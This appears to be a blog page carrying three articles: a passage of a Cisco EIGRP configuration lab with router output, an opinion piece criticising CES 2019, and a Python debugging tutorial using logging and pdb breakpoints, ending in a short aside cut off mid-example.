This is what makes EIGRP so awesome since it keeps all the routes from their neighbors and, if a route goes down, it can query the topology table for an alternate route. But, what if the query to the topology table does not work? Well, EIGRP will then ask its neighbors for help to find an alternate path! The DUAL strategy and the reliability and leveraging of other routers make it the quickest to converge on a network. For the DUAL to work, it must meet the following three requirements: Neighbors are discovered or noted as dead within a distinct time Messages that transmitted should be received correctly Messages and changes received must be dealt with in the order they were received The following command will show you those hello messages received, and more: R1#sh ip eigrp traffic IP-EIGRP Traffic Statistics for process 100 Hellos sent/received: 56845/37880 Updates sent/received: 9/14 Queries sent/received: 0/0 Replies sent/received: 0/0 Acks sent/received: 14/9 Input queue high water mark 1, 0 drops SIA-Queries sent/received: 0/0 SIA-Replies sent/received: 0/0 If you wanted to change the default hello timer to something greater, the command would be the following: Remember that this command is typed under interface configuration mode. Configuring EIGRP EIGRP also works with tables. The routing table, topology table, and neighbor table, all work together to make sure if a path to a destination network fails then the routing protocol will always have an alternate path to that network. The alternate path is chosen by the FD or feasible distance. If you have the lowest FD, then you are the successor route and will be placed in the routing table. If you have a higher FD, you will remain in the topology table as a feasible successor. So, EIGRP is a very reliable protocol. Let's configure it. The following topology is going to be a full mesh, with LANs on each router. This will add to the complexity of the lab, so we can look at everything we have talked about. Before we begin configurations, we must know the IP addressing scheme of each device. The following table shows the addresses, gateways, and masks of each device: The routing protocol in use must learn to use our show commands: R1#sh ip protocols Routing Protocol is "eigrp 100 " Outgoing update filter list for all interfaces is not set Incoming update filter list for all interfaces is not set Default networks flagged in outgoing updates Default networks accepted from incoming updates EIGRP metric weight K1=1, K2=0, K3=1, K4=0, K5=0 EIGRP maximum hopcount 100 EIGRP maximum metric variance 1 Redistributing: eigrp 100 Automatic network summarization is not in effect Maximum path: 4 Routing for Networks: 192.168.1.0 10.0.0.0 Routing Information Sources: Gateway Distance Last Update 10.1.1.10 90 1739292 10.1.1.22 90 1755881 10.1.1.6 90 1774985 Distance: internal 90 external 170 Okay, you have the topology, the IP scheme, and which routing protocol to use, and its autonomous system. As you can see, I already configured the lab, but now it's your turn. You are going to have to configure it to follow along with the show command we are about to do. You should, by now, know your admin commands. The first thing you need to worry about is connectivity, so I will show you the output of the sh ip int brief command from each router: As you can see, all my interfaces have the correct IPv4 addresses and they are all up; your configuration should be the same. 
If you also want to see the subnet mask of the command you could have done, which is like sh ip int brief, it is sh protocols: After you have checked that all your interfaces are up and running, it is now time to configure the routing protocol. We will be doing a single autonomous system using the number 100 on all the routers, so they can share the same routing table. Through the uses of hello messages, they can discover their neighbors. The configuration of the EIGRP protocol should look like this per router: As you can see, we are using the 100 autonomous system number for all routers and when we advertise the networks, especially the 10.1.1.0 network, we use the classfull boundary, which is a Class A network. We must not forget the no auto-summary command or it will not send out the subnet mask on the updates. Now, let's check out our routing tables to see if we have converged fully, meaning we have found all our networks: R2 R2#SH IP ROUTE Gateway of last resort is not set 10.0.0.0/30 is subnetted, 6 subnets D 10.1.1.4 [90/2172416] via 10.1.1.26, 02:27:38, FastEthernet0/1 C 10.1.1.8 is directly connected, Serial0/0/0 D 10.1.1.12 [90/2172416] via 10.1.1.26, 02:27:38, FastEthernet0/1 C 10.1.1.16 is directly connected, Serial0/0/1 D 10.1.1.20 [90/2172416] via 10.1.1.9, 02:27:39, Serial0/0/0 [90/2172416] via 10.1.1.18, 02:27:39, Serial0/0/1 C 10.1.1.24 is directly connected, FastEthernet0/1 D 192.168.1.0/24 [90/2172416] via 10.1.1.9, 02:27:39, Serial0/0/0 C 192.168.2.0/24 is directly connected, FastEthernet0/0 D 192.168.3.0/24 [90/2172416] via 10.1.1.18, 02:27:39, Serial0/0/1 D 192.168.4.0/24 [90/30720] via 10.1.1.26, 02:27:38, FastEthernet0/1 R3 R3Gateway of last resort is not set 10.0.0.0/30 is subnetted, 6 subnets D 10.1.1.4 [90/2172416] via 10.1.1.21, 02:28:49, FastEthernet0/1 D 10.1.1.8 [90/2172416] via 10.1.1.21, 02:28:49, FastEthernet0/1 C 10.1.1.12 is directly connected, Serial0/0/1 C 10.1.1.16 is directly connected, Serial0/0/0 C 10.1.1.20 is directly connected, FastEthernet0/1 D 10.1.1.24 [90/2172416] via 10.1.1.17, 02:28:50, Serial0/0/0 [90/2172416] via 10.1.1.14, 02:28:50, Serial0/0/1 D 192.168.1.0/24 [90/30720] via 10.1.1.21, 02:28:49, FastEthernet0/1 D 192.168.2.0/24 [90/2172416] via 10.1.1.17, 02:28:50, Serial0/0/0 C 192.168.3.0/24 is directly connected, FastEthernet0/0 D 192.168.4.0/24 [90/2172416] via 10.1.1.14, 02:28:50, Serial0/0/1 R4 R4#SH IP ROUTE Gateway of last resort is not set 10.0.0.0/30 is subnetted, 6 subnets C 10.1.1.4 is directly connected, Serial0/0/1 D 10.1.1.8 [90/2172416] via 10.1.1.25, 02:29:51, FastEthernet0/1 C 10.1.1.12 is directly connected, Serial0/0/0 D 10.1.1.16 [90/2172416] via 10.1.1.25, 02:29:51, FastEthernet0/1 D 10.1.1.20 [90/2172416] via 10.1.1.5, 02:29:52, Serial0/0/1 [90/2172416] via 10.1.1.13, 02:29:52, Serial0/0/0 C 10.1.1.24 is directly connected, FastEthernet0/1 D 192.168.1.0/24 [90/2172416] via 10.1.1.5, 02:29:52, Serial0/0/1 D 192.168.2.0/24 [90/30720] via 10.1.1.25, 02:29:51, FastEthernet0/1 D 192.168.3.0/24 [90/2172416] via 10.1.1.13, 02:29:52, Serial0/0/0 C 192.168.4.0/24 is directly connected, FastEthernet0/0 It seems that EIGRP has found all our different networks and has applied the best metric to each destination. If you look closely at the routing table, you will see that two networks have multiple paths to it: 10.1.1.20 and 10.1.1.24. The path that it takes is determined by the router that is learning it. So, what does that mean? 
EIGRP has two successor routes or two feasible distances that are equal, so they must go to the routing table. All other routes to include the successor routes will be in the topology table. I have highlighted the networks that have the multiple paths, which means they can go in either direction, but EIGRP will load balance by default when it has multiple paths: We need to see exactly which path it is taking to this network: 10.1.1.20. This is from the R4 viewpoint. It could go via 10.1.1.5 or 10.1.1.13, so let's use the tools we have at hand, such as traceroute: R4#traceroute 10.1.1.20 Type escape sequence to abort. Tracing the route to 10.1.1.20 1 10.1.1.5 7msec 1 msec 6 msec So, even if they have the identical metric of 2172416, it will choose the first path from top to bottom, to send the packet to the destination. If that path is shut down or is disconnected, it will still have an alternate route to get to the destination. In your lab, if you followed the configuration exactly as I did it, you should get the same results. But, this is where your curiosity should come in. Shut down the 10.1.1.5 interface and see what happens. What will your routing table look like then? Will it have only one route to the destination or will it have more than one? Remember that when a successor route goes down, EIGRP will query the topology table to find an alternate route, but in this situation, will it do that, since an alternate route exists? Let's take a look: R1(config)#int s0/0/0 R1(config-if)#shut Now let's take a look at the routing table from the R4 perspective. The first thing that happens is the following: R4# %LINK-5-CHANGED: Interface Serial0/0/1, changed state to down %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial0/0/1, changed state to down %DUAL-5-NBRCHANGE: IP-EIGRP 100: Neighbor 10.1.1.5 (Serial0/0/1) is down: interface down R4#sh ip route Gateway of last resort is not set 10.0.0.0/30 is subnetted, 5 subnets D 10.1.1.8 [90/2172416] via 10.1.1.25, 02:57:14, FastEthernet0/1 C 10.1.1.12 is directly connected, Serial0/0/0 D 10.1.1.16 [90/2172416] via 10.1.1.25, 02:57:14, FastEthernet0/1 D 10.1.1.20 [90/2172416] via 10.1.1.13, 02:57:15, Serial0/0/0 C 10.1.1.24 is directly connected, FastEthernet0/1 D 192.168.1.0/24 [90/2174976] via 10.1.1.13, 02:57:14, Serial0/0/0 D 192.168.2.0/24 [90/30720] via 10.1.1.25, 02:57:14, FastEthernet0/1 D 192.168.3.0/24 [90/2172416] via 10.1.1.13, 02:57:15, Serial0/0/0 C 192.168.4.0/24 is directly connected, FastEthernet0/0 Only one route exists, which is 10.1.1.13. It had the same metric as 10.1.1.5. So, in this situation, there was no need to query the topology table, since an existing alternate route already existed in the routing table. But, let's verify this with the traceroute command: R4#traceroute 10.1.1.20 Type escape sequence to abort. Tracing the route to 10.1.1.20 1 10.1.1.13 0 msec 5 msec 1 msec (alternate path) 1 10.1.1.5 7msec 1 msec 6 msec (original path) Since it only had one path to get to the 10.1.1.20 network, it was quicker in getting there, but when it had multiple paths, it took longer. Now I know we are talking about milliseconds, but still, it is a delay, none the less. So, what does this tell us? Redundancy is not always a good thing. This is a full-mesh topology, which is very costly and we are running into delays. So, be careful in your design of the network. There is such a thing as too much redundancy and you can easily create Layer 3 loops and delays. 
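As an aside, the successor and feasible-successor selection described above can be modeled in a few lines of Python. This is an illustrative sketch only, not Cisco IOS and not from the certification guide; the metrics mirror the 192.168.3.0 example from the topology table:

# Topology-table entries for 192.168.3.0/24, keyed by next hop (sample values)
topology = {
    '10.1.1.13': 2172416,  # feasible distance via Serial0/0/0
    '10.1.1.5': 2174976,   # feasible distance via Serial0/0/1
}

best = min(topology.values())

# All next hops sharing the lowest FD are installed as successors
# (and load balanced); higher metrics stay in the topology table
successors = [hop for hop, fd in topology.items() if fd == best]
feasible_successors = [hop for hop, fd in topology.items() if fd > best]

print('Successor route(s):', successors)              # ['10.1.1.13']
print('Feasible successor(s):', feasible_successors)  # ['10.1.1.5']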
We looked at the routing table, but not the topology table, so I am going to turn on the s0/0/0 interface again and look at the routing table once more to make sure all is as it was and then look at the topology table. Almost immediately after turning on the s0/0/0 interface on R1, I receive the following message: R4# %LINK-5-CHANGED: Interface Serial0/0/1, changed state to up %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial0/0/1, changed state to up %DUAL-5-NBRCHANGE: IP-EIGRP 100: Neighbor 10.1.1.5 (Serial0/0/1) is up: new adjacency Let us peek at the routing table on R4: R4#sh ip route Gateway of last resort is not set 10.0.0.0/30 is subnetted, 6 subnets C 10.1.1.4 is directly connected, Serial0/0/1 D 10.1.1.8 [90/2172416] via 10.1.1.25, 03:08:05, FastEthernet0/1 C 10.1.1.12 is directly connected, Serial0/0/0 D 10.1.1.16 [90/2172416] via 10.1.1.25, 03:08:05, FastEthernet0/1 D 10.1.1.20 [90/2172416] via 10.1.1.13, 03:08:05, Serial0/0/0 [90/2172416] via 10.1.1.5, 00:01:45, Serial0/0/1 C 10.1.1.24 is directly connected, FastEthernet0/1 D 192.168.1.0/24 [90/2172416] via 10.1.1.5, 00:01:45, Serial0/0/1 D 192.168.2.0/24 [90/30720] via 10.1.1.25, 03:08:05, FastEthernet0/1 D 192.168.3.0/24 [90/2172416] via 10.1.1.13, 03:08:05, Serial0/0/0 C 192.168.4.0/24 is directly connected, FastEthernet0/0 Notice that the first path in the network is through 10.1.1.13 and not 10.1.1.5, as before. Now let us look at the topology table: Keep in mind that the topology has all possible routes to all destination networks. Only the ones with the lowest FD make it to the routing table and earn the title of the successor route. If you notice the highlighted networks, they are the same as the ones on the routing table. They both have the exact same metric, so they would both earn the title of successor route. But let's analyze another network. Let's choose that last one on the list, 192.168.3.0. It has multiple routes, but the metrics are not the same. If you notice, the FD is 2172416, so 10.1.1.13 would be the successor route, but 10.1.1.5 has a metric of 2174976, which truly makes it a feasible successor and will remain in the topology table. So, what does that mean to us? Well, if the successor route was to go down, then it would have to query the topology table in order to acquire an alternate path. What does the routing table show us about the 192.168.3.0 network, from the R3 perspective? R4#sh ip route D 192.168.3.0/24 [90/2172416] via 10.1.1.13, 03:28:10, Serial0/0/0 There is only one route, the one with the lowest FD, so it's true that, in this case, if this route goes down, a query to the topology table must take place. So, you see it all depends on how you set up your network topology; you may have a feasible successor, or you may not. So, you must analyze the network you are working with to make it an effective network. We have not even changed the bandwidth of any of the interfaces or used the variance command in order to include other routes in our load balancing. Thus, in this article, we covered, how EIGRP works, its features, and configuring EIGRP for single autonomous systems and multiple autonomous systems. To know more about designing and implementing subnetted IPv4 and IPv6 addressing schemes, and more, check out the book  CCNA Routing and Switching 200-125 Certification Guide. Using IPv6 on Packet Tracer IPv6 support to be automatically rolled out for most Netify Application Delivery Network users IPv6, Unix Domain Sockets, and Network Interfaces

CES 2019 is bullshit we don't need after 2018's techlash

Richard Gall
08 Jan 2019
6 min read
The asinine charade that is CES is running in Las Vegas this week. Describing itself as 'the global stage of innovation', CES attempts to set the agenda for a new year in tech. While ostensibly it's an opportunity to see how technology might impact the lives of all of us over the next decade (or more), it is, in truth, a vapid carnival that does nothing but make the technology industry look stupid. Okay, perhaps I'm being a fun sponge: what's wrong with smart doorbells, internet connected planks of wood and other madcap ideas? Well, nothing really - but those inventions are only the tip of the iceberg. Disagree? Don't worry: you can find the biggest announcements from day one of CES 2019 here. What CES gets wrong Where CES really gets it wrong - and where it drives down a dead end of vacuity - is how it showcases the mind numbing rush to productize and then commercialize some of the really serious developments that could transform the world in a way that is ultimately far less trivial than the glitz and glamor of the way it is presented in the media would suggest. This isn't to say that there there won't be important news and interesting discussions to come out of CES. But even the more interesting topics can be diluted, becoming buzzwords for marketers to latch onto. As Wired remarks on Twitter, "the term AI-powered is used loosely and is almost always a marketing ploy, whether or not a product is impacted by AI." In the same thread, the publication's account also notes that 5G, another big theme for the event, won't be widely available for at least another 12 months. https://twitter.com/WIRED/status/1082294957979910144 Ultimately, what this tells us is that the focus of CES isn't really technology - not in the sense of how we build it and how we should use it. Instead, it is an event dedicated to the ways we can sell it. Perhaps in previous years, the gleeful excitement of CES was nothing but a bit of light as we recover from the holiday period. But this year it's different. 2018 was a year of reckoning in tech, as a range of scandals emerged that underlined the ways in which exciting technological innovation can be misused and deployed against the very people we assume it should be helping. From the Cambridge Analytica scandal to the controversy surrounding Amazon's Rekognition, Google's Project Dragonfly, and Microsoft's relationship with ICE, 2018 was a year that made it clearer than ever that buried somewhere beneath novel and amusing inventions, and better quality television screens are a set of interests that have little interest in making life better for people. The corporate glamor of CES 2019 is just kitsch It's not news that there are certain organisations and institutions that don't have the interests of the majority at heart. But CES 2019 does take on a new complexion in the shadow of all that has happened in 2019. The question 'what's the point of all this' takes on a more serious edge. When you add in the dissent that has come from a growing part of the Silicon Valley workforce, CES 2019 starts to look like an event that, much like many industry leaders, wants to bury the messy and complex reality of building software in favor of marketing buzz. In The Unbearable Lightness of Being, the author Milan Kundera describes kitsch as "the absolute denial of shit." It's following this definition that you can see CES as a kitsch event. This is because the it pushes the decisions and inevitable trade offs that go into developing new technologies and products into the shadows. 
It doesn't take negative consequences seriously. It's all just 'shit' that should be ignored. This all adds up to a message that seems to be: better doesn't even need to be built. It's here already, no risks, no challenges. Developers don't really feature at CES. That's not necessarily a problem - after all, it's not an event for them, and what developer wants to spend time hearing marketers talk about AI? But if 2018 has taught us anything, it's that a culture of commercialization that refuses to consider consequences other than what can be done in the service of business growth can be immensely damaging. It hurts people, and it might even be hurting democracy. Okay, the way to correct things probably isn't to simply invite more engineers to CES. But by the same token, CES is hardly helping things either. Everything important is happening outside the event Everything important seems to be happening at the periphery of this year's CES, in some instances quite literally outside the building. Apple's ad, for example, might have been a clever piece of branding, but it has captured the attention of the world. Arguably, it's more memorable than much of what's happening inside the event. And although it's possible to be cynical, it does nevertheless raise important questions about a number of companies attitudes to user data. https://twitter.com/NateIngraham/status/1081612316532064257 Another big talking point as this year's event began is who isn't present. Due to the government shutdown a number of officials that were due to attend and speak have had to cancel. This acts as a reminder of the wider context in which CES 2019 is taking place, in which a nativist government looks set on controlling controlling who and how people move across borders. It also highlights how euphemistic the phrase 'consumer technology' really is. TVs and cloud connected toilets might take the headlines, but its government surveillance that will likely have the biggest impact on our lives in the future. Not that any of this seemed to matter to Gary Shapiro, the Chief Executive of the Consumer Technology Association (the organization that puts on CES). Speaking to the BBC, Shapiro said: “It’s embarrassing to be on the world stage with a dominant event in the world of technology, and our federal government... can't be there to host their colleague government executives from around the world.” Shapiro's frustration is understandable from an organizer's perspective. But it also betrays the apparent ethos of CES: what's happening outside doesn't matter. We all deserve better than CES 2019 The new products on show at CES 2019 won't make everything better. There's a chance they will make everything worse. Arguably, the more blindly optimistic we are that they'll make things better, the more likely they are to make things worse. It's only by thinking through complex questions, and taking time to consider the possible consequences of our decision making as developers, product managers, or business people that we can actually be sure that things will get better. This doesn't mean we need to stop getting excited about new inventions and innovations. But things like smart cities and driverless cars pose a whole range of issues that shouldn't be buried in the optimistic schmaltz of events like CES. They need care and attention from policy makers, designers, software engineers, and many others to ensure they are actually going to help to build a better world for people.

Learn how to debug in Python [Tutorial]

Bhagyashree R
08 Jan 2019
16 min read
Writing code isn't easy. Even the best programmer in the world can't foresee any possible alternative and flow of the code.  This means that executing our code will always produce surprises and unexpected behavior. Some will be very evident and others will be very subtle, but the ability to identify and remove these defects in the code is critical to building solid software. These defects in software are known as bugs, and therefore removing them is called debugging. Inspecting the code just by reading it is not great. There are always surprises, and complex code is difficult to follow. That's why the ability to debug by stopping execution and taking a look at the current state of things is important. This article is an excerpt from a book written by Jaime Buelta titled Python Automation Cookbook.  The Python Automation Cookbook helps you develop a clear understanding of how to automate your business processes using Python, including detecting opportunities by scraping the web, analyzing information to generate automatic spreadsheets reports with graphs, and communicating with automatically generated emails. To follow along with the examples implemented in the article, you can find the code on the book's GitHub repository. In this article, we will see some of the tools and techniques for debugging, and apply them specifically to Python scripts. The scripts will have some bugs that we will fix as part of the recipe. Debugging through logging A simple, yet very effective, debugging approach is to output variables and other information at strategic parts of your code to follow the flow of the program. The simplest form of this approach is called print debugging or inserting print statements at certain points to print the value of variables or points while debugging. But taking this technique a little bit further and combining it with the logging techniques allows us to create a semi-permanent trace of the execution of the program, which can be really useful when detecting issues in a running program. Getting ready Download the debug_logging.py file from GitHub. It contains an implementation of the bubble sort algorithm, which is the simplest way to sort a list of elements. It iterates several times over the list, and on each iteration, two adjacent values are checked and interchanged, so the bigger one is after the smaller. This makes the bigger values ascend like bubbles in the list. When run, it checks the following list to verify that it is correct: assert [1, 2, 3, 4, 7, 10] == bubble_sort([3, 7, 10, 2, 4, 1]) How to do it... Run the debug_logging.py script and check whether it fails: $ python debug_logging.py INFO:Sorting the list: [3, 7, 10, 2, 4, 1] INFO:Sorted list: [2, 3, 4, 7, 10, 1] Traceback (most recent call last): File "debug_logging.py", line 17, in <module> assert [1, 2, 3, 4, 7, 10] == bubble_sort([3, 7, 10, 2, 4, 1]) AssertionError Enable the debug logging, changing the second line of the debug_logging.py script: logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.INFO) Change the preceding line to the following one: logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG) Note the different level. 
Run the script again, with more information inside: $ python debug_logging.py INFO:Sorting the list: [3, 7, 10, 2, 4, 1] DEBUG:alist: [3, 7, 10, 2, 4, 1] DEBUG:alist: [3, 7, 10, 2, 4, 1] DEBUG:alist: [3, 7, 2, 10, 4, 1] DEBUG:alist: [3, 7, 2, 4, 10, 1] DEBUG:alist: [3, 7, 2, 4, 10, 1] DEBUG:alist: [3, 2, 7, 4, 10, 1] DEBUG:alist: [3, 2, 4, 7, 10, 1] DEBUG:alist: [2, 3, 4, 7, 10, 1] DEBUG:alist: [2, 3, 4, 7, 10, 1] DEBUG:alist: [2, 3, 4, 7, 10, 1] INFO:Sorted list : [2, 3, 4, 7, 10, 1] Traceback (most recent call last): File "debug_logging.py", line 17, in <module> assert [1, 2, 3, 4, 7, 10] == bubble_sort([3, 7, 10, 2, 4, 1]) AssertionError After analyzing the output, we realize that the last element of the list is not sorted. We analyze the code and discover an off-by-one error in line 7. Do you see it? Let's fix it by changing the following line: for passnum in reversed(range(len(alist) - 1)): Change the preceding line to the following one: for passnum in reversed(range(len(alist))): (Notice the removal of the -1 operation.)  Run it again and you will see that it works as expected. The debug logs are not displayed here: $ python debug_logging.py INFO:Sorting the list: [3, 7, 10, 2, 4, 1] ... INFO:Sorted list : [1, 2, 3, 4, 7, 10] How it works... Step 1 presents the script and shows that the code is faulty, as it's not properly sorting the list. The script already has some logs to show the start and end result, as well as some debug logs that show each intermediate step. In step 2, we activate the display of the DEBUG logs, as in step 1 only the INFO ones were shown. Step 3 runs the script again, this time displaying extra information, showing that the last element in the list is not sorted. The bug is an off-by-one error, a very common kind of error, as it should iterate to the whole size of the list. This is fixed in step 4. Step 5 shows that the fixed script runs correctly. Debugging with breakpoints Python has a ready-to-go debugger called pdb. Given that Python code is interpreted, this means that stopping the execution of the code at any point is possible by setting a breakpoint, which will jump into a command line where any code can be used to analyze the situation and execute any number of instructions. Let's see how to do it. Getting ready Download the debug_algorithm.py script, available from GitHub. The code checks whether numbers follow certain properties: def valid(candidate): if candidate <= 1: return False lower = candidate - 1 while lower > 1: if candidate / lower == candidate // lower: return False lower -= 1 return True assert not valid(1) assert valid(3) assert not valid(15) assert not valid(18) assert not valid(50) assert valid(53) It is possible that you recognize what the code is doing but bear with me so that we can analyze it interactively. How to do it... Run the code to see all the assertions are valid: $ python debug_algorithm.py Add  breakpoint(), after the while loop, just before line 7, resulting in the following: while lower > 1: breakpoint() if candidate / lower == candidate // lower:  Execute the code again, and see that it stops at the breakpoint, entering into the interactive Pdb mode: $ python debug_algorithm.py > .../debug_algorithm.py(8)valid() -> if candidate / lower == candidate // lower: (Pdb) Check the value of the candidate and the two operations. 
This line is checking whether the dividing of candidate by lower is an integer (the float and integer division is the same): (Pdb) candidate 3 (Pdb) candidate / lower 1.5 (Pdb) candidate // lower 1 Continue to the next instruction with n. See that it ends the while loop and returns True: (Pdb) n > ...debug_algorithm.py(10)valid() -> lower -= 1 (Pdb) n > ...debug_algorithm.py(6)valid() -> while lower > 1: (Pdb) n > ...debug_algorithm.py(12)valid() -> return True (Pdb) n --Return-- > ...debug_algorithm.py(12)valid()->True -> return True Continue the execution until another breakpoint is found with c. Note that this is the next call to valid(), which has 15 as an input: (Pdb) c > ...debug_algorithm.py(8)valid() -> if candidate / lower == candidate // lower: (Pdb) candidate 15 (Pdb) lower 14 Continue running and inspecting the numbers until what the valid function is doing makes sense. Are you able to find out what the code does? (If you can't, don't worry and check the next section.) When you're done, exit with q. This stops the execution: (Pdb) q ... bdb.BdbQuit How it works... The code is, as you probably know already, checking whether a number is a prime number. It tries to divide the number by all integers lower than it. If at any point is divisible, it returns a False result, because it's not a prime. After checking the general execution in step 1, in step 2, we introduced a breakpoint in the code. When the code is executed in step 3, it stops at the breakpoint position, entering into an interactive mode. In the interactive mode, we can inspect the values of any variable as well as perform any kind of operation. As demonstrated in step 4, sometimes, a line of code can be better analyzed by reproducing its parts. The code can be inspected and regular operations can be executed in the command line. The next line of code can be executed by calling n(ext), as done in step 5 several times, to see the flow of the code. Step 6 shows how to resume the execution with the c(ontinue) command in order, to stop in the next breakpoint. All these operations can be iterated to see the flow and values, and to understand what the code is doing at any point. The execution can be stopped with q(uit), as demonstrated in step 7. Improving your debugging skills In this recipe, we will analyze a small script that replicates a call to an external service, analyzing it and fixing some bugs. We will show different techniques to improve the debugging. The script will ping some personal names to an internet server (httpbin.org, a test site) to get them back, simulating its retrieval from an external server. It will then split them into first and last name and prepare them to be sorted by surname. Finally, it will sort them. The script contains several bugs that we will detect and fix. Getting ready For this recipe, we will use the requests and parse modules and include them in our virtual environment: $ echo "requests==2.18.3" >> requirements.txt $ echo "parse==1.8.2" >> requirements.txt $ pip install -r requirements.txt The debug_skills.py script is available from GitHub. Note that it contains bugs that we will fix as part of this recipe. How to do it... Run the script, which will generate an error: $ python debug_skills.py Traceback (most recent call last): File "debug_skills.py", line 26, in <module> raise Exception(f'Error accessing server: {result}') Exception: Error accessing server: <Response [405]> Analyze the status code. We get 405, which means that the method we sent is not allowed. 
We inspect the code and realize that for the call in line 24, we used GET when the proper one is POST (as described in the URL). Replace the code with the following: # ERROR Step 2. Using .get when it should be .post # (old) result = requests.get('http://httpbin.org/post', json=data) result = requests.post('http://httpbin.org/post', json=data) We keep the old buggy code commented with (old) for clarity of changes. Run the code again, which will produce a different error: $ python debug_skills.py Traceback (most recent call last): File "debug_skills_solved.py", line 34, in <module> first_name, last_name = full_name.split() ValueError: too many values to unpack (expected 2) Insert a breakpoint in line 33, one preceding the error. Run it again and enter into debugging mode: $ python debug_skills_solved.py ..debug_skills.py(35)<module>() -> first_name, last_name = full_name.split() (Pdb) n > ...debug_skills.py(36)<module>() -> ready_name = f'{last_name}, {first_name}' (Pdb) c > ...debug_skills.py(34)<module>() -> breakpoint() Running n does not produce an error, meaning that it's not the first value. After a few runs on c, we realize that this is not the correct approach, as we don't know what input is the one generating the error. Instead, we wrap the line with a try...except block and produce a breakpoint at that point: try: first_name, last_name = full_name.split() except: breakpoint() We run the code again. This time the code stops at the moment the data produced an error: $ python debug_skills.py > ...debug_skills.py(38)<module>() -> ready_name = f'{last_name}, {first_name}' (Pdb) full_name 'John Paul Smith' The cause is now clear, line 35 only allows us to split two words, but raises an error if a middle name is added. After some testing, we settle into this line to fix it: # ERROR Step 6 split only two words. Some names has middle names # (old) first_name, last_name = full_name.split() first_name, last_name = full_name.rsplit(maxsplit=1) We run the script again. Be sure to remove the breakpoint and try..except block. This time, it generates a list of names! And they are sorted alphabetically by surname. However, a few of the names look incorrect: $ python debug_skills_solved.py ['Berg, Keagan', 'Cordova, Mai', 'Craig, Michael', 'Garc\\u00eda, Roc\\u00edo', 'Mccabe, Fathima', "O'Carroll, S\\u00e9amus", 'Pate, Poppy-Mae', 'Rennie, Vivienne', 'Smith, John Paul', 'Smyth, John', 'Sullivan, Roman'] Who's called O'Carroll, S\\u00e9amus? To analyze this particular case, but skip the rest, we must create an if condition to break only for that name in line 33. Notice the in to avoid having to be totally correct: full_name = parse.search('"custname": "{name}"', raw_result)['name'] if "O'Carroll" in full_name: breakpoint() Run the script once more. 
The breakpoint stops at the proper moment: $ python debug_skills.py > debug_skills.py(38)<module>() -> first_name, last_name = full_name.rsplit(maxsplit=1) (Pdb) full_name "S\\u00e9amus O'Carroll" Move upward in the code and check the different variables: (Pdb) full_name "S\\u00e9amus O'Carroll" (Pdb) raw_result '{"custname": "S\\u00e9amus O\'Carroll"}' (Pdb) result.json() {'args': {}, 'data': '{"custname": "S\\u00e9amus O\'Carroll"}', 'files': {}, 'form': {}, 'headers': {'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'close', 'Content-Length': '37', 'Content-Type': 'application/json', 'Host': 'httpbin.org', 'User-Agent': 'python-requests/2.18.3'}, 'json': {'custname': "Séamus O'Carroll"}, 'origin': '89.100.17.159', 'url': 'http://httpbin.org/post'} In the result.json() dictionary, there's actually a different field that seems to be rendering the name properly, which is called 'json'. Let's look at it in detail; we can see that it's a dictionary: (Pdb) result.json()['json'] {'custname': "Séamus O'Carroll"} (Pdb) type(result.json()['json']) <class 'dict'> Change the code, instead of parsing the raw value in 'data', use directly the 'json' field from the result. This simplifies the code, which is great! # ERROR Step 11. Obtain the value from a raw value. Use # the decoded JSON instead # raw_result = result.json()['data'] # Extract the name from the result # full_name = parse.search('"custname": "{name}"', raw_result)['name'] raw_result = result.json()['json'] full_name = raw_result['custname'] Run the code again. Remember to remove the breakpoint: $ python debug_skills.py ['Berg, Keagan', 'Cordova, Mai', 'Craig, Michael', 'García, Rocío', 'Mccabe, Fathima', "O'Carroll, Séamus", 'Pate, Poppy-Mae', 'Rennie, Vivienne', 'Smith, John Paul', 'Smyth, John', 'Sullivan, Roman'] This time, it's all correct! You have successfully debugged the program! How it works... The structure of the recipe is divided into three different problems. Let's analyze it in small blocks: First error—Wrong call to the external service: After showing the first error in step 1, we read with care the resulting error, saying that the server is returning a 405 status code. This corresponds to a method not allowed, indicating that our calling method is not correct. Inspect the following line: result = requests.get('http://httpbin.org/post', json=data) It gives us the indication that we are using a GET call to one URL that's defined for POST, so we make the change in step 2. We run the code in step 3 to find the next problem. Second error—Wrong handling of middle names: In step 3, we get an error of too many values to unpack. We create a breakpoint to analyze the data in step 4 at this point but discover that not all the data produces this error. The analysis done in step 4 shows that it may be very confusing to stop the execution when an error is not produced, having to continue until it does. We know that the error is produced at this point, but only for certain kind of data. As we know that the error is being produced at some point, we capture it in a try..except block in step 5. When the exception is produced, we trigger the breakpoint. This makes step 6 execution of the script to stop when the full_name is 'John Paul Smith'. This produces an error as the split expects two elements, not three. This is fixed in step 7, allowing everything except the last word to be part of the first name, grouping any middle name(s) into the first element. This fits our purpose for this program, to sort by the last name. 
The following line does that with rsplit: first_name, last_name = full_name.rsplit(maxsplit=1) It divides the text by words, starting from the right and making a maximum of one split, guaranteeing that only two elements will be returned. When the code is changed, step 8 runs the code again to discover the next error. Third error—Using a wrong returned value by the external service: Running the code in step 8 displays the list and does not produce any errors. But, examining the results, we can see that some of the names are incorrectly processed. We pick one of the examples in step 9 and create a conditional breakpoint. We only activate the breakpoint if the data fulfills the if condition. The code is run again in step 10. From there, once validated that the data is as expected, we worked backward to find the root of the problem. Step 11 analyzes previous values and the code up to that point, trying to find out what lead to the incorrect value. We then discover that we used the wrong field in the returned value from the result from the server. The value in the json field is better for this task and it's already parsed for us. Step 12 checks the value and sees how it should be used. In step 13, we change the code to adjust. Notice that the parse module is no longer needed and that the code is actually cleaner using the json field. Once this is fixed, the code is run again in step 14. Finally, the code is doing what's expected, sorting the names alphabetically by surname. Notice that the other name that contained strange characters is fixed as well. To summarize, this article discussed different methods and tips to help in the debugging process and ensure the quality of your software. It leverages the great introspection capabilities of Python and its out-of-the-box debugging tools for fixing problems and producing solid automated software. If you found this post useful, do check out the book, Python Automation Cookbook.  This book helps you develop a clear understanding of how to automate your business processes using Python, including detecting opportunities by scraping the web, analyzing information to generate automatic spreadsheets reports with graphs, and communicating with automatically generated emails. Getting started with Web Scraping using Python [Tutorial] How to perform sentiment analysis using Python [Tutorial] How to predict viral content using random forest regression in Python [Tutorial]
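As a closing aside (not part of the original recipe), the conditional-breakpoint trick used above generalizes to any suspicious value. Here is a small, self-contained sketch with made-up sample names:

names = ['Mai Cordova', "S\\u00e9amus O'Carroll", 'John Paul Smith']

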